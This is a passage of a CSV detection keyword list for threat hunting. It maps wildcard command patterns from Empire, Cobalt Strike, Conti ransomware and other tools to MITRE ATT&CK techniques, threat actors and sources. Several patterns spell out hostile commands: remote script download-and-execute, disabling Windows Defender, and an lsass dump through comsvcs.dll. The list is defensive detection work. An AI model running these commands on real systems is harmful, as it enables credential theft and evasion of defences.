Net.WebClient).DownloadString(*) Get-NetComputer -FullData *,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell IEX (New-Object Net.WebClient).DownloadString*.ps1*Get-NetComputer -FullData*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation 
tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell Invoke-WebRequest http*.bat *,offensive_tool_keyword,Zloader,Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike,T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204,TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003,N/A,N/A,Exploitation tools,https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Powershell LDAPWordlistHarvester*,offensive_tool_keyword,LDAPWordlistHarvester,A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.,T1210.001 - T1087.003 - T1110,TA0001 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/p0dalirius/LDAPWordlistHarvester,1,0,N/A,5,3,218,14,2023-10-01T21:12:10Z,2023-09-22T10:10:10Z -*powershell New-ItemProperty -Path *HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender* -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force*,greyware_tool_keyword,powershell,Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. 
disable Microsoft firewall and clear logs.,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAyADAANAAxADIALwAnACkAOwAgAC4AXAByAGMAbABvAG4AZQBtAGEAbgBhAGcAZQByAC4AcABzADEA*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #14,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell*Uninstall-WindowsFeature -Name Windows-Defender-GUI*,greyware_tool_keyword,powershell,Windows Defender tampering technique ,T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/,1,0,N/A,10,8,N/A,N/A,N/A,N/A -*Powershell.exe -windowstyle hidden -nop -ExecutionPolicy Bypass -Commmand *C:\Users\*\AppData\Roaming\*,greyware_tool_keyword,powershell,Adversaries may attempt to execute powershell script from known accessible location,T1059.001 - T1036 - T1216,TA0002 - TA0006,N/A,N/A,Exploitation Tools,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*powershell.exe -exec bypass -noni -nop -w 1 -C*,greyware_tool_keyword,powershell,command pattern used by crackmapexec by default A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,High risk of false 
positive,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*powershell.exe -noni -nop -w 1 -enc *,greyware_tool_keyword,powershell,command pattern used by crackmapexec by default A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,0,High risk of false positive,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*powershell.exe -noninteractive -executionpolicy bypass ipconfig /all*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #8,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell.exe -noninteractive -executionpolicy bypass ps lsass*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #11,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell.exe -noninteractive -executionpolicy bypass quser*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #10,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation 
tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell.exe -noninteractive -executionpolicy bypass rundll32.exe C:\windows\System32\comsvcs.dll* MiniDump * C:\programdata\a.zip full*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #13,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell.exe -noninteractive -executionpolicy bypass Start-Process c:\windows\SVN.exe -ArgumentList *-connect * -pass Password1234*,offensive_tool_keyword,Conti Ranwomware,Conti Ransomware Proxyshell PowerShell command #12,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001,Conti ransomware - TrickBot,N/A,Exploitation tools,https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell.exe -NoP -sta -NonI -W Hidden -Command *Action = New-ScheduledTaskAction -Execute *,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,0,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*powershell_code_execution_invoke_assembly*,offensive_tool_keyword,empire,Empire is a post-exploitation 
and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*powershell_collection_keylogger*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - 
T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*powershell_collection_screenshot*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*powershell_command_x64.ps1*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - 
TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*powershell_command_x86.ps1*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*powershell_credentials_tokens*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*powershell_encode_oneliner*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*powershell_encode_oneliner*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan 
- Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*powershell_encode_stager*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*powershell_encode_stager*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*powershell_management_psinject*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*powershell_management_spawn*,offensive_tool_keyword,empire,Empire is a post-exploitation and 
adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*PowerShell_PoC.zip*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*powershell_privesc_bypassuac_eventvwr*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*powershell_privesc_sherlock*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - 
T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*powershell_reverse_shell.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*powershell_reverse_tcp.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
